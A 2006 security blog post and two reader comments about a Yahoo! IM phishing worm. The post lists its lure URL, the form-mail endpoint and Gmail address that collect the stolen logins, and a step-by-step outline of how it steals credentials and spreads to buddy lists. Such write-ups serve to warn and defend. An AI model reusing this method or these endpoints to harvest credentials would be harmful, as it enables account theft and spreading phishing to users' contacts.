Mom, how could you! Part II: Revenge of the Yahoo! worm

Dave G. | November 24th, 2006 | Filed Under: Malware

Tis the season! Looks like the same fellow who did this chose Thanksgiving Day to strike again. Good timing from an attacker perspective. This was sent to my Yahoo IM:

http://www.geocities.com/isyourfriendneartoyou08/ Find your match

And then it:


  1. presents a Yahoo! Photos page
  2. steals credentials on submit
  3. sends it to: http://www2.fiberbit.net/form/mailto.cgi
  4. who mails it to “sanchopansas@gmail.com”
  5. redirects the user to their own Yahoo Photo’s page
  6. logs into Yahoo IM as the unfortunate sap
  7. sends the URL to everyone on their buddy list

Have (or hope you had) a Happy Thanksgiving!

2 Comments so far

  • Subliminal

    November 27th, 2006 7:57 am

    I just got this a few weeks ago from a friend on my yahoo list. Then early this morning from my gf. Now I know for a fact her computer isn’t secure at all. I checked the link from her using firefox and reviewed the page source info and sure enough was “sanchopansas@gmail.com”. What steps can she do to remove this. Does it put a virus on her comp? Or does this sancho person log on them once in a while and sends the links? How does this really work?

  • Dave G.

    November 28th, 2006 4:01 am

    Subliminal:

    Most likely some automated software logs in as her and sends the IM. If she changes her password she should be fine.

    Dave

    • Leave a reply